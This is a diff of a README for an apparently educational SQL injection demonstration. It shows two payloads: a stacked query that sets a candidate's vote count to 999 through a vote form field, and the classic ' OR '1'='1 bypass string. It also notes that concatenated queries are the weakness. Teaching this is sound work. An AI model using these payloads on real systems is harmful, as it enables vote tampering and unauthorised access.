Shambhavijain/sql_injection/README.md

 ---

-SQL Injection Demonstration
+## SQL Injection Demonstration

-📝 Vote Form Injection
+### 📝 Vote Form Injection

 Try submitting this as input for the Candidate ID field in the vote form:

 1'), 1); UPDATE votes SET vote_count = 999 WHERE candidate_id = '1'; --

-🔐 Login Bypass Injection
+### 🔐 Result Bypass Injection

 ' OR '1'='1

 ---

 🧱 What's Vulnerable?
 SQL queries built using string concatenation or f-strings.